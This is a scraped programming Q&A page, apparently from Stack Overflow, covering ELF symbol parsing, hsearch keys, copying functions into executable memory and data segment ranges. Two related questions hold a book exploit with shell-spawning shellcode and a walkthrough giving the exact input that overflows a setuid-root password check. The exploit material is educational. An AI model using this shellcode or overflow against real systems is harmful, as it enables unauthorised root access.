Elf Symtab Parsing Null Pointer - c

I hate to ask people to help me debug my code, but I'm really stuck on this. I have a simple code snippet that walks the symbols in .symtab and prints them to the console. Apparently, I have a null pointer in the calls to printf and strcmp (resulting in a segfault), but I can't figure out why.
Here is the code snippet:
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <elf.h>
#include <fcntl.h>
#ifdef DEBUG
#define PRINTDEBUG(x) printf x //variable number of arguments
#else
#define PRINTDEBUG(x) do{} while(0)
#endif
uint32_t main(int argc, char** argv){
char* filename = argv[1];
char* sym_name = argv[2];
int fd = open(filename, O_RDONLY);
struct stat st;
stat(fd, &st);
char mem[st.st_size];
read(fd, mem, st.st_size);
Elf32_Ehdr* ehdr;
Elf32_Shdr* shdr; //generic entry for enumerating sections
Elf32_Shdr strtab; //holds string in symtab
Elf32_Shdr symtab;
char* sh_strtab; //hold sections names
Elf32_Sym* sym;
ehdr = (Elf32_Ehdr *)mem;
shdr = (Elf32_Shdr* )(mem + ehdr->e_shoff);
PRINTDEBUG(("number of section headers: %d\n", ehdr->e_shnum)); //need double brackets for variable #of arguments
sh_strtab = (char *)(mem + (shdr[ehdr->e_shstrndx].sh_offset));
//find address of symtab and strtab
for(int i = 0; i < ehdr->e_shnum; i++){
if(shdr[i].sh_size){
printf("%s\n", &sh_strtab[shdr[i].sh_name]);
if(strcmp(&sh_strtab[shdr[i].sh_name], ".strtab") == 0)
strtab = shdr[i];
if(strcmp(&sh_strtab[shdr[i].sh_name], ".symtab") == 0)
symtab = shdr[i];
}
}
PRINTDEBUG(("symtab offset %x\n", symtab.sh_offset));
PRINTDEBUG(("strtab offset %x\n", strtab.sh_offset));
char* symtab_str = (char *)(mem + strtab.sh_offset);
sym = (Elf32_Sym* )(mem + symtab.sh_offset);
printf("Symbol names: \n");
for(int i = 0; i < (symtab.sh_size / symtab.sh_entsize); i++, sym++){
printf("%x\n",&symtab_str[sym->st_name]);
if(strcmp(&symtab_str[sym->st_name], sym_name) ==0)
printf("not crahsed\n");
//TODO: resolve reloc'd syms
}
}
The null pointer occurs at &symtab_str[sym->st_name]. Weird thing is, I've looked at the assembly with the debugger and it shows &symtab_str[sym->st_name] pointing to the correct value, i.e. the first string in .strtab.
EDIT: Posted the code snippet that should trigger the segfault. Compile with the "-m32" flag for gcc. Provide the pathname of a 32-bit ELF file as the first run parameter, i.e.
./symtab_parse test_file
I already got this working as I originally intended. However, I am not sure about the cause of the segfault, and as pointed out by EmployedRussian, my original answer was not the root cause of the problem. Would like to really get to the bottom of this mystery, and hopefully learn something from it.

As you can see, the address stored in eax points to the first string in .strtab, so why am I getting a null pointer when passing this to strcmp?
The code snippet you showed appears to be correct, and if eax is 0xffd6a030 at the call to strcmp, then by definition it is not NULL.
Your (unsupported by evidence) assertion that it is NULL is what appears to be wrong (in other words, you are probably mis-interpreting something, and you didn't show that something).
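Separately from the NULL question, one detail in the posted snippet is worth ruling out: it calls stat(fd, &st), but stat() takes a path name, while fstat() is the variant that takes a file descriptor. Whether this contributes to the crash is an assumption that has not been verified here. The following is only a sketch of loading the file with the return values checked; load_file is a hypothetical helper name, not something from the question.

```c
#include <fcntl.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper: read a whole file into a heap buffer.
 * Returns NULL on failure. On success the size is stored in *size_out
 * and the caller must free() the returned buffer. */
unsigned char *load_file(const char *path, size_t *size_out)
{
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return NULL;

    struct stat st;
    /* fstat() takes the descriptor; stat() would expect a path here. */
    if (fstat(fd, &st) != 0 || st.st_size <= 0) {
        close(fd);
        return NULL;
    }

    size_t size = (size_t)st.st_size;
    unsigned char *buf = malloc(size);   /* heap, not a VLA on the stack */
    size_t done = 0;
    while (buf != NULL && done < size) {
        ssize_t n = read(fd, buf + done, size - done);
        if (n <= 0) {                    /* error or unexpected end of file */
            free(buf);
            buf = NULL;
        } else {
            done += (size_t)n;
        }
    }
    close(fd);
    if (buf != NULL)
        *size_out = size;
    return buf;
}
```

With a buffer obtained this way, the ELF header cast in the question would become something like ehdr = (Elf32_Ehdr *)buf, after checking that the size is at least sizeof(Elf32_Ehdr).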

According to this section from the ELF specs:
String table sections hold null-terminated character sequences,
commonly called strings. The object uses these strings to represent
symbol and section names. One references a string as an index into
the string table section. The first byte, which is index zero, is
defined to hold a null character.
This means that symtab_str[0] points to a null character, which, when dereferenced in strcmp, resulted in a segfault. Modifying the code to check for the null string before performing the strcmp fixed the problem.
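As the question's edit notes, this explanation turned out not to be the root cause. A pointer to a '\0' byte is a valid pointer to an empty string, not a NULL pointer, so strcmp can read it safely. What can go wrong is an st_name index that points outside the string table. The sketch below is one way to guard against that; strtab_name is a hypothetical helper, and its size argument is assumed to come from the section header's sh_size.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical helper: return the string at `index` in a string table of
 * `size` bytes, or NULL if the index is out of range or the string is not
 * terminated inside the table. */
const char *strtab_name(const char *strtab, size_t size, uint32_t index)
{
    if (strtab == NULL || index >= size)
        return NULL;
    /* memchr() searches for the terminating '\0' without leaving the table. */
    if (memchr(strtab + index, '\0', size - index) == NULL)
        return NULL;
    return strtab + index;
}
```

For index 0 this returns a pointer to the empty string, which compares unequal to any non-empty symbol name without crashing.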

Related

"The Shellcoder's Handbook" attack.c does not make sense

From "The Shellcoder's Handbook", victim.c is as follows
// victim.c
int main(int argc,char *argv[])
{
char little_array[512];
if (argc > 1)
strcpy(little_array,argv[1]);
}
Its exploit, attack.c is as follows
#include <stdlib.h>
#define offset_size 0
#define buffer_size 512
char sc[] =
"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
"\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"; //the shellcode(Spawn shell)
unsigned long find_start(void) {
__asm__("movl %esp,%eax"); //Get ESP's value and return it.
}
int main(int argc, char *argv[])
{
char *buff, *ptr;
long *addr_ptr, addr; //addr_ptr: The address of the NOP sled to jump to when the program retrieves its saved EIP.
int offset=offset_size, bsize=buffer_size;
int i;
if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset = atoi(argv[2]);
addr = find_start() - offset;
printf("Attempting address: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
ptr += 4;
for (i = 0; i < strlen(sc); i++)
*(ptr++) = sc[i];
buff[bsize - 1] = '\0';
memcpy(buff,"BUF=",4);
putenv(buff);
system("/bin/bash");
}
ptr = buff; assigns buff's garbage value to ptr (buff is not initialized). The subsequent line, addr_ptr = (long *) ptr;, assigns ptr's value (buff's garbage value) to addr_ptr. The author's intent on these lines is not clear to me. addr_ptr is supposed to contain the address to which the program jumps, preferably the NOP sled, when it retrieves the saved EIP. However, addr_ptr contains a garbage value instead.
I believe buff should be dynamically allocated, using malloc first.
I know "The Shellcoder's Handbook" has many errors, but it is one of the few books that talk about software exploitation.
On line 26
addr = find_start() - offset;
addr is set to the target return address, so it's not really garbage.
From my understanding what the authors do is to first fill the whole buffer with addr repeatedly, so that this serves both as garbage data and as return address to overwrite the stored EIP. Additionally, doing this allows them to not care about the right offset to place the return address, provided the buffer is well DWORD aligned on the stack.
Then they overwrite the beginning of the "garbage data part" of this buffer with BUF= followed by the shellcode. This works because BUF= is of length 4, so it does not break the DWORD alignment.
Yes, buff should be allocated. Note that if you check the nopattack.c in the following pages, where they add the NOP sled to the exploit, you see that it is indeed allocated on line 28:
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
Also, if you compare attack.c and nopattack.c, the codes have quite some differences (allocation, variable and function names, #define constants capitalized...) which is surprising when the latter code is supposed to be just one iteration after the former. This suggests a refactoring may have been made at some point when they wrote the book (or the second edition), and the error could come from this.
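To make the buffer layout described in this answer concrete, here is a minimal sketch with the allocation in place. It is not the book's code: build_env_buffer is a hypothetical helper, the payload parameter stands in for the sc array, and a 4-byte address is assumed as in the 32-bit example.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical helper mirroring the layout described above:
 * [ "BUF=" ][ payload ][ addr addr addr ... ][ '\0' ] */
char *build_env_buffer(size_t bsize, uint32_t addr,
                       const unsigned char *payload, size_t payload_len)
{
    /* Need room for "BUF=", the payload and the terminating '\0'. */
    if (bsize < 4 + payload_len + 1)
        return NULL;

    char *buff = calloc(bsize, 1);       /* the allocation attack.c omits */
    if (buff == NULL)
        return NULL;

    /* Fill the buffer with the 4-byte address, repeated word by word. */
    for (size_t i = 0; i + sizeof addr <= bsize; i += sizeof addr)
        memcpy(buff + i, &addr, sizeof addr);

    memcpy(buff + 4, payload, payload_len);  /* payload starts after word 0 */
    memcpy(buff, "BUF=", 4);                 /* 4 bytes, so words stay aligned */
    buff[bsize - 1] = '\0';
    return buff;
}
```

Because "BUF=" occupies exactly one 4-byte word, every remaining copy of addr still starts at a multiple of 4 from the beginning of the buffer.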

How to store keys of associative array in C implemented via hcreate/hsearch by value (not by reference)?

Using associative arrays implemented via the POSIX hcreate/hsearch functions (as described here), I ran into some unexpected behaviour: finding keys I've never entered, or the other way around.
I tracked it down to some instance of store-by-reference-instead-of-value.
This was surprising to me, since the example uses string literals as keys:
store("red", 0xff0000);
store("orange", 0x123456); /* Insert wrong value! */
store("green", 0x008000);
store("blue", 0x0000ff);
store("white", 0xffffff);
store("black", 0x000000);
store("orange", 0xffa500); /* Replace with correct value. */
Here is an MWE that shows my problem:
#include <inttypes.h> /* intptr_t */
#include <search.h> /* hcreate(), hsearch() */
#include <stdio.h> /* perror() */
#include <stdlib.h> /* exit() */
#include <string.h> /* strcpy() */
void exit_with_error(const char* error_message){
perror(error_message);
exit(EXIT_FAILURE);
}
int fetch(const char* key, intptr_t* value){
ENTRY e,*p;
e.key=(char*)key;
p=hsearch(e, FIND);
if(!p) return 0;
*value=(intptr_t)p->data;
return 1;
}
void store(const char *key, intptr_t value){
ENTRY e,*p;
e.key=(char*)key;
p = hsearch(e, ENTER);
if(!p) exit_with_error("hash full");
p->data = (void *)value;
}
void main(){
char a[4]="foo";
char b[4]="bar";
char c[4]="";
intptr_t x=NULL;
if(!hcreate(50)) exit_with_error("no hash");
store(a,1); /* a --> 1 */
strcpy(c,a); /* remember a */
strcpy(a,b); /* set a to b */
store(a,-1); /* b --> -1 */
strcpy(a,c); /* reset a */
if(fetch(a,&x)&&x==1) puts("a is here.");
if(!fetch(b,&x)) puts("b is not.");
strcpy(a,b); printf("But if we adjust a to match b");
if(fetch(a,&x)&&x==-1&&fetch(b,&x)&&x==-1) puts(", we find both.");
exit(EXIT_SUCCESS);
}
Compiling and executing above C code results in the following output:
a is here.
b is not.
But if we adjust a to match b, we find both.
I will need to read a file and store a large number of string:int pairs, and then I will need to read a second file to check an even larger number of strings for previously stored values.
I don't see how this would be possible if keys are compared by reference.
How can I change my associative array implementation to store keys by value?
And if that's not possible, how can I work around that problem given the above use case?
edit:
This question just deals with keys entered but not found.
The opposite problem also appears and is described in detail in this question.
edit:
It turned out that store() needs to strdup() key to fix this and another problem.
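A minimal sketch of that fix follows. hsearch() keeps the key pointer it is given rather than copying the string, so changing the caller's buffer later also changes the stored key. The names store_copy and fetch_value are hypothetical, chosen to avoid clashing with the functions above, and the copy is made only when the key is new so that repeated stores do not leak.

```c
#define _XOPEN_SOURCE 700   /* strdup() and hsearch() under strict -std modes */
#include <inttypes.h>
#include <search.h>
#include <stdlib.h>
#include <string.h>

/* Store key -> value, keeping a private copy of the key.
 * Returns 1 on success, 0 on failure. */
int store_copy(const char *key, intptr_t value)
{
    ENTRY e, *p;

    e.key = (char *)key;
    e.data = NULL;
    p = hsearch(e, FIND);            /* already present? then just update */
    if (p == NULL) {
        e.key = strdup(key);         /* the table now owns its own copy */
        if (e.key == NULL)
            return 0;
        p = hsearch(e, ENTER);
        if (p == NULL) {             /* table full */
            free(e.key);
            return 0;
        }
    }
    p->data = (void *)value;
    return 1;
}

/* Look up key; returns 1 and sets *value if found, 0 otherwise. */
int fetch_value(const char *key, intptr_t *value)
{
    ENTRY e, *p;

    e.key = (char *)key;
    e.data = NULL;
    p = hsearch(e, FIND);
    if (p == NULL)
        return 0;
    *value = (intptr_t)p->data;
    return 1;
}
```

With this version, reusing one buffer for several keys, as in the MWE, no longer disturbs entries that were stored earlier.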
I found out that by using the same variable for storage & lookup, I can actually retrieve all the values in the array:
void main(){
char a[4]="foo";
char b[4]="bar";
char c[4]="baz";
char t[4]="";
intptr_t x=NULL;
if(!hcreate(50)) exit_with_error("no hash");
strcpy(t,a); store(t, 1); /* a --> 1 */
strcpy(t,b); store(t,-1); /* b --> -1 */
strcpy(t,c); store(t, 0); /* c --> 0 */
if(!fetch(a,&x)) puts("a is not here.");
if(!fetch(b,&x)) puts("Neither is b.");
if( fetch(c,&x)) puts("c is in (and equal to t).");
strcpy(t,a); if(fetch(t,&x)&&x== 1) puts("t can retrieve a.");
strcpy(t,b); if(fetch(t,&x)&&x==-1) puts("It also finds b.");
strcpy(t,c); if(fetch(t,&x)&&x== 0) puts("And as expected c.");
exit(EXIT_SUCCESS);
}
This results in the following output:
a is not here.
Neither is b.
c is in (and equal to t).
t can retrieve a.
It also finds b.
And as expected c.
However, I still don't understand why this is happening.
Somehow it seems the key needs to be at the same location (reference) and contain the same content (value) to be found.

Creating a basic stack overflow using IDA

This program is running with root privileges on my machine, and I need to perform a stack overflow attack on the following code to get root privileges:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <openssl/sha.h>
void sha256(char *string, char outputBuffer[65])
{
unsigned char hash[SHA256_DIGEST_LENGTH];
int i = 0;
SHA256_CTX sha256;
SHA256_Init(&sha256);
SHA256_Update(&sha256, string, strlen(string));
SHA256_Final(hash, &sha256);
for(i = 0; i < SHA256_DIGEST_LENGTH; i++)
{
sprintf(outputBuffer + (i * 2), "%02x", hash[i]);
}
outputBuffer[64] = 0;
}
int password_check(char *userpass)
{
char text[20] = "thisisasalt";
unsigned int password_match = 0;
char output[65] = { 0, };
// >>> hashlib.sha256("Hello, world!").hexdigest()
char pass[] = "315f5bdb76d078c43b8ac0064e4a0164612b1fce77c869345bfc94c75894edd3";
text[0] = 'a';
text[1] = 't';
text[2] = 'j';
text[3] = '5';
text[4] = '3';
text[5] = 'k';
text[6] = '$';
text[7] = 'g';
text[8] = 'f';
text[9] = '[';
text[10] = ']';
text[11] = '\0';
strcat(text, userpass);
sha256(text, output);
if (strcmp(output, pass) == 0)
{
password_match = 1;
}
return (password_match == 1);
}
int main(int argc, char **argv)
{
if (argc < 3)
{
printf("Usage: %s <pass> <command>\n", argv[0]);
exit(1);
}
if (strlen((const char *) argv[1]) > 10)
{
printf("Error: pasword too long\n");
exit(1);
}
if (password_check(argv[1]))
{
printf("Running command as root: %s\n", argv[2]);
setuid(0);
setgid(0);
system(argv[2]);
}
else
{
printf("Authentication failed! This activity will be logged!\n");
}
return 0;
}
So I try to analyse the program with IDA and I see the text segment going from the lower addresses to the higher addresses, higher than that I see the data and then the bss and finally external commands.
Now as far as I know the stack should be just above that, but I'm not certain how to view it, how exactly am I supposed to view the stack in order to know what I'm writing on? (Do I even need it or am I completely clueless?)
The second question concerns the length of the input: how do I get around this check in the code:
if (strlen((const char *) argv[1]) > 10)
{
printf("Error: pasword too long\n");
exit(1);
}
Can I somehow give the string to the program by reference? If so how do I do it? (Again, hoping I'm not completely clueless)
Now as far as I know the stack should be just above that, but I'm not certain how to view it, how exactly am I supposed to view the stack in order to know what I'm writing on? (Do I even need it or am I completely clueless?)
The stack location varies all the time. You need to look at the value of the ESP/RSP register; its value is the current address of the top of the stack. Typically, variable addressing will be based on EBP rather than ESP, but they both will point to the same general area of memory.
During analysis, IDA sets up a stack frame for each function, which acts much like a struct - you can define variables with types and names in it. This frame is summarized at the top of the function:
Double-clicking it or any local variable in the function body will open a more detailed window. That's as good as you can get without actually running your program in a debugger.
You can see that text is right next to password_match, and judging from the addresses, there are 0x14 bytes allocated for text, as one would expect. However, this is not guaranteed and the compiler can freely shuffle the variables around, pad them or optimize them into registers.
The second question concerns the length of the input: how do I get around this check in the code:
if (strlen((const char *) argv[1]) > 10)
{
printf("Error: pasword too long\n");
exit(1);
}
You don't need to get around this check, it's already broken enough. There's an off-by-one error.
Stop reading here if you want to figure out the overflow yourself.
The valid range of indices for text spans from text[0] through text[19]. In the code, user input is written to the memory area starting at text[11]. The maximum input length allowed by the strlen check is 10 symbols plus the NUL terminator. Unfortunately, that means text[19] contains the 9th user-entered symbol, and the 10th symbol and the terminator overflow into adjacent memory. Under certain circumstances, that allows you to overwrite the least significant byte of password_match with an arbitrary value, and the second least significant byte with a 0. Your function accepts the password if password_match equals 1, which means the 10th character in your password needs to be '\x01' (note that this is not the same character as '1').
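The index arithmetic above can be written down as a small check. This is only an illustration of the off-by-one; bytes_past_end is a hypothetical helper, not part of the program under discussion.

```c
#include <stddef.h>

/* Hypothetical helper: how many bytes strcat() writes past the end of a
 * buffer of `buf_size` bytes that already holds `prefix_len` characters,
 * when `input_len` more characters plus the terminator are appended. */
size_t bytes_past_end(size_t buf_size, size_t prefix_len, size_t input_len)
{
    size_t needed = prefix_len + input_len + 1;   /* +1 for the '\0' */
    return needed > buf_size ? needed - buf_size : 0;
}
```

For the program above, bytes_past_end(20, 11, 10) is 2: the 10th input character and the terminator. The longest input that still fits is 8 characters, so a length check of "> 8" rather than "> 10" would have closed the hole.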
Here are two screenshots from IDA running as a debugger. text is highlighted in yellow, password_match is in green.
The password I entered was 123456789\x01.
Stack before user entered password is strcat'd into text.
Stack after strcat. Notice that password_match changed.

Copy a function in memory and execute it

I would like to know how, in C, I can copy the content of a function into memory and then execute it.
I'm trying to do something like this:
typedef void(*FUN)(int *);
char * myNewFunc;
char *allocExecutablePages (int pages)
{
char *template = (char *) valloc (getpagesize () * pages);
/* protect the whole allocation, not just the first page */
if (mprotect (template, getpagesize () * pages,
PROT_READ|PROT_EXEC|PROT_WRITE) == -1) {
perror ("mprotect");
}
return template;
}
void f1 (int *v) {
*v = 10;
}
// allocate enough space but how much ??
myNewFunc = allocExecutablePages(...)
/* Copy f1 somewhere else
* (how? assume that I know the size of f1 having done a (nm -S foo.o))
*/
((FUN)myNewFunc)(&val);
printf("%i",val);
Thanks for your answers
You seem to have figured out the part about protection flags. If you know the size of the function, now you can just do memcpy() and pass the address of f1 as the source address.
One big caveat is that, on many platforms, you will not be able to call any other functions from the one you're copying (f1), because relative addresses are hardcoded into the binary code of the function, and moving it to a different location in memory can make those relative addresses turn bad.
This happens to work because function1 and function2 are exactly the same size in memory.
We need the length of function2 for our memcpy, so what should be done is:
int diff = (&main - &function2);
You'll notice you can edit function 2 to your liking and it keeps working just fine!
Btw, neat trick. Unfortunately, the g++ compiler does spit out an invalid conversion from void* to int... But with gcc it compiles perfectly ;)
Modified sources:
//Hacky solution and simple proof of concept that works for me (and compiles without warning on Mac OS X/GCC 4.2.1):
//fixed the diff address to also work when function2 is variable size
#include "stdio.h"
#include "stdlib.h"
#include "string.h"
#include <sys/mman.h>
int function1(int x){
return x-5;
}
int function2(int x){
//printf("hello world");
int k=32;
int l=40;
return x+5+k+l;
}
int main(){
int diff = (&main - &function2);
printf("pagesize: %d, diff: %d\n",getpagesize(),diff);
int (*fptr)(int);
void *memfun = malloc(4096);
if (mprotect(memfun, 4096, PROT_READ|PROT_EXEC|PROT_WRITE) == -1) {
perror ("mprotect");
}
memcpy(memfun, (const void*)&function2, diff);
fptr = &function1;
printf("native: %d\n",(*fptr)(6));
fptr = memfun;
printf("memory: %d\n",(*fptr)(6) );
fptr = &function1;
printf("native: %d\n",(*fptr)(6));
free(memfun);
return 0;
}
Output:
Walter-Schrepperss-MacBook-Pro:cppWork wschrep$ gcc memoryFun.c
Walter-Schrepperss-MacBook-Pro:cppWork wschrep$ ./a.out
pagesize: 4096, diff: 35
native: 1
memory: 83
native: 1
Another thing to note is that calling printf from the copied function will segfault, most likely because printf is no longer found once the relative address goes wrong...
Hacky solution and simple proof of concept that works for me (and compiles without warning on Mac OS X/GCC 4.2.1):
#include "stdio.h"
#include "stdlib.h"
#include "string.h"
#include <sys/mman.h>
int function1(int x){
return x-5;
}
int function2(int x){
return x+5;
}
int main(){
int diff = (&function2 - &function1);
printf("pagesize: %d, diff: %d\n",getpagesize(),diff);
int (*fptr)(int);
void *memfun = malloc(4096);
if (mprotect(memfun, 4096, PROT_READ|PROT_EXEC|PROT_WRITE) == -1) {
perror ("mprotect");
}
memcpy(memfun, (const void*)&function2, diff);
fptr = &function1;
printf("native: %d\n",(*fptr)(6));
fptr = memfun;
printf("memory: %d\n",(*fptr)(6) );
fptr = &function1;
printf("native: %d\n",(*fptr)(6));
free(memfun);
return 0;
}
I have tried this issue many times in C and came to the conclusion that it cannot be accomplished using only the C language. My main thorn was finding the length of the function to copy.
The Standard C language does not provide any methods to obtain the length of a function. However, one can use assembly language and "sections" to find the length. Once the length is found, copying and executing is easy.
The easiest solution is to create or define a linker segment that contains the function. Write an assembly language module to calculate and publicly declare the length of this segment. Use this constant for the size of the function.
There are other methods that involve setting up the linker, such as predefined areas or fixed locations and copying those locations.
In embedded systems land, most of the code that copies executable stuff into RAM is written in assembly.
This might be a hack solution. Could you place a dummy variable or function directly after the function to be copied, obtain that dummy's address, and then subtract the function's address from it to obtain the function size? This might be possible since memory is laid out linearly and in order (rather than randomly), although the compiler and linker are not required to keep that order. This would also keep function copying closer to portable ANSI C rather than delving into system-specific assembly code. I find C to be rather flexible; one just needs to think things out.

Finding the address range of the data segment

As a programming exercise, I am writing a mark-and-sweep garbage collector in C. I wish to scan the data segment (globals, etc.) for pointers to allocated memory, but I don't know how to get the range of the addresses of this segment. How could I do this?
If you're working on Windows, then there are Windows APIs that can help you.
//store the base address the loaded Module
dllImageBase = (char*)hModule; //suppose hModule is the handle to the loaded Module (.exe or .dll)
//get the address of NT Header
IMAGE_NT_HEADERS *pNtHdr = ImageNtHeader(hModule);
//after the NT headers comes the section table, so get the address of the section table
IMAGE_SECTION_HEADER *pSectionHdr = (IMAGE_SECTION_HEADER *) (pNtHdr + 1);
ImageSectionInfo *pSectionInfo = NULL;
//iterate through the list of all sections, and check the section name in the if condition, etc.
for ( int i = 0 ; i < pNtHdr->FileHeader.NumberOfSections ; i++ )
{
char *name = (char*) pSectionHdr->Name;
if ( memcmp(name, ".data", 5) == 0 )
{
pSectionInfo = new ImageSectionInfo(".data");
pSectionInfo->SectionAddress = dllImageBase + pSectionHdr->VirtualAddress;
//range of the data segment - something you're looking for
pSectionInfo->SectionSize = pSectionHdr->Misc.VirtualSize;
break;
}
pSectionHdr++;
}
Define ImageSectionInfo as,
struct ImageSectionInfo
{
char SectionName[IMAGE_SIZEOF_SHORT_NAME];//the macro is defined WinNT.h
char *SectionAddress;
int SectionSize;
ImageSectionInfo(const char* name)
{
strcpy(SectionName, name);
}
};
Here's a complete, minimal WIN32 console program you can run in Visual Studio that demonstrates the use of the Windows API:
#include <stdio.h>
#include <Windows.h>
#include <DbgHelp.h>
#pragma comment( lib, "dbghelp.lib" )
void print_PE_section_info(HANDLE hModule) // hModule is the handle to a loaded Module (.exe or .dll)
{
// get the location of the module's IMAGE_NT_HEADERS structure
IMAGE_NT_HEADERS *pNtHdr = ImageNtHeader(hModule);
// section table immediately follows the IMAGE_NT_HEADERS
IMAGE_SECTION_HEADER *pSectionHdr = (IMAGE_SECTION_HEADER *)(pNtHdr + 1);
const char* imageBase = (const char*)hModule;
char scnName[sizeof(pSectionHdr->Name) + 1];
scnName[sizeof(scnName) - 1] = '\0'; // enforce nul-termination for scn names that are the whole length of pSectionHdr->Name[]
for (int scn = 0; scn < pNtHdr->FileHeader.NumberOfSections; ++scn)
{
// Note: pSectionHdr->Name[] is 8 bytes long. If the scn name is 8 bytes long, ->Name[] will
// not be nul-terminated. For this reason, copy it to a local buffer that's nul-terminated
// to be sure we only print the real scn name, and no extra garbage beyond it.
strncpy(scnName, (const char*)pSectionHdr->Name, sizeof(pSectionHdr->Name));
printf(" Section %3d: %p...%p %-10s (%u bytes)\n",
scn,
imageBase + pSectionHdr->VirtualAddress,
imageBase + pSectionHdr->VirtualAddress + pSectionHdr->Misc.VirtualSize - 1,
scnName,
pSectionHdr->Misc.VirtualSize);
++pSectionHdr;
}
}
// For demo purposes, create an extra constant data section whose name is exactly 8 bytes long (the max)
#pragma const_seg(".t_const") // begin allocating const data in a new section whose name is 8 bytes long (the max)
const char const_string1[] = "This string is allocated in a special const data segment named \".t_const\".";
#pragma const_seg() // resume allocating const data in the normal .rdata section
int main(int argc, const char* argv[])
{
print_PE_section_info(GetModuleHandle(NULL)); // print section info for "this process's .exe file" (NULL)
}
This page may be helpful if you're interested in additional uses of the DbgHelp library.
You can read about the PE image format here to learn it in detail. Once you understand the PE format, you'll be able to work with the above code, and can even modify it to meet your needs.
PE Format
Peering Inside the PE: A Tour of the Win32 Portable Executable File Format
An In-Depth Look into the Win32 Portable Executable File Format, Part 1
An In-Depth Look into the Win32 Portable Executable File Format, Part 2
Windows API and Structures
IMAGE_SECTION_HEADER Structure
ImageNtHeader Function
IMAGE_NT_HEADERS Structure
I think this would help you to great extent, and the rest you can research yourself :-)
By the way, you can also see this thread, as all of these are somehow related to this:
Scenario: Global variables in DLL which is used by Multi-threaded Application
The bounds for text (program code) and data on Linux (and other Unixes):
#include <stdio.h>
#include <stdlib.h>
/* these are in no header file, and on some
systems they have a _ prepended
These symbols have to be typed to keep the compiler happy
Also check out brk() and sbrk() for information
about heap */
extern char etext, edata, end;
int
main(int argc, char **argv)
{
printf("First address beyond:\n");
printf(" program text segment(etext) %10p\n", &etext);
printf(" initialized data segment(edata) %10p\n", &edata);
printf(" uninitialized data segment (end) %10p\n", &end);
return EXIT_SUCCESS;
}
Where those symbols come from: Where are the symbols etext ,edata and end defined?
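Once a range is known, the mark phase can scan it conservatively, treating every aligned word that falls inside the collector's heap as a possible pointer. The following is a minimal sketch of that idea under stated assumptions: count_heap_candidates is a hypothetical helper, the heap bounds are assumed to be tracked by your allocator, and a real collector would mark the object instead of counting.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical helper for a conservative scan: count the pointer-sized,
 * pointer-aligned words in [start, end) whose value lies in
 * [heap_lo, heap_hi). */
size_t count_heap_candidates(const void *start, const void *end,
                             uintptr_t heap_lo, uintptr_t heap_hi)
{
    uintptr_t p = (uintptr_t)start;
    uintptr_t stop = (uintptr_t)end;
    size_t align = sizeof(uintptr_t);
    size_t found = 0;

    p = (p + align - 1) / align * align;      /* round up to word alignment */
    while (p < stop && stop - p >= sizeof(uintptr_t)) {
        uintptr_t word;
        /* memcpy() reads the word without violating aliasing rules. */
        memcpy(&word, (const void *)p, sizeof word);
        if (word >= heap_lo && word < heap_hi)
            found++;                          /* a real GC would mark here */
        p += align;
    }
    return found;
}
```

The upper bound could be &end from the program above. The lower bound needs more care, since &etext marks the end of the code rather than the exact start of writable data.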
Since you'll probably have to make your garbage collector the environment in which the program runs, you can get it from the ELF file directly.
Load the file that the executable came from and parse the PE headers, for Win32. I've no idea about other OSes. Remember that if your program consists of multiple files (e.g. DLLs) you may have multiple data segments.
For iOS you can use this solution. It shows how to find the text segment range but you can easily change it to find any segment you like.

Resources